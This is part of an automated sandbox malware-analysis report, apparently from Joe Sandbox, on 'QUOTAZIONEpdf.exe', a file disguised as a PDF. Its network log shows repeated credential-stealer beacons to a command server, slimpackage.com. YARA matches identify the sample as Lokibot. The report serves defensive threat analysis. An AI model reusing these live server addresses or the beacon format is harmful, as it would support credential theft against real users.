              Jan 14, 2022 09:53:54.269267082 CET9597OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:54.529158115 CET9598INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:53 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              36192.168.2.349824104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:57.036107063 CET10122OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:57.289953947 CET10273INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:56 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              37192.168.2.349825104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:59.975080013 CET10274OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:00.267862082 CET10274INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:59 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              38192.168.2.349826104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:02.086796045 CET10275OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:02.343744040 CET10276INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:01 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              39192.168.2.349832104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:03.505878925 CET10288OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:03.763714075 CET10292INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:02 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              4192.168.2.349746104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:44.662959099 CET1110OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:44.925323009 CET1111INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:43 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              40192.168.2.349840104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:04.907351017 CET10305OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:05.161437035 CET10309INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:04 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              41192.168.2.349852104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:07.608302116 CET10337OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:07.866544008 CET10338INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:06 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              42192.168.2.349853104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:10.712951899 CET10338OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:10.966197014 CET10339INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:09 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              43192.168.2.349854104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:14.681171894 CET10340OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:14.940711975 CET10340INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:13 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              44192.168.2.349855104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:17.053160906 CET10341OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:17.313810110 CET10342INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:16 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              45192.168.2.349856104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:20.315522909 CET10343OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:20.574155092 CET10344INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:19 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              46192.168.2.349857104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:22.278675079 CET10345OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:22.548707962 CET10345INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:21 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              47192.168.2.349858104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:24.759273052 CET10346OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:25.014372110 CET10347INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:23 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              48192.168.2.349859104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:26.128942013 CET10347OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:26.390346050 CET10348INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:25 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              49192.168.2.349860104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:27.459033012 CET10349OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:27.717861891 CET10349INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:26 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              5192.168.2.349747104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:46.652462959 CET1111OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:46.909101009 CET1112INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:45 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              50192.168.2.349861104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:28.746130943 CET10350OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:29.017143965 CET10351INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:27 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              51192.168.2.349862104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:30.197088957 CET10352OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:30.453828096 CET10352INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:29 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              52192.168.2.349863104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:31.498490095 CET10353OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:31.754610062 CET10354INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:30 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              53192.168.2.349864104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:32.828735113 CET10355OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:33.107048988 CET10355INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:32 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              54192.168.2.349865104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:34.246263981 CET10356OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:34.502947092 CET10357INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:33 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              55192.168.2.349866104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:35.583282948 CET10357OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:35.838768005 CET10358INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:34 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              6192.168.2.349748104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:48.938221931 CET1113OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:49.243886948 CET1113INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:48 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              7192.168.2.349749104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:50.316401958 CET1114OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:50.639916897 CET1115INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:49 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              8192.168.2.349750104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:51.814681053 CET1116OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:52.091804981 CET1116INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:51 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              9192.168.2.349751104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:53.249068975 CET1117OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:53.547552109 CET1118INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:52 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Code Manipulations

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              Analysis Process: QUOTAZIONEpdf.exe PID: 6352 Parent PID: 5328

              General

              Start time:09:52:29
              Start date:14/01/2022
              Path:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
              Imagebase:0x400000
              File size:250601 bytes
              MD5 hash:23B85C2F43B23B57411E4F4366A10B25
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              Analysis Process: QUOTAZIONEpdf.exe PID: 808 Parent PID: 6352

              General

              Start time:09:52:31
              Start date:14/01/2022
              Path:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
              Imagebase:0x400000
              File size:250601 bytes
              MD5 hash:23B85C2F43B23B57411E4F4366A10B25
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000003.316877844.0000000000533000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.556036179.0000000000518000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
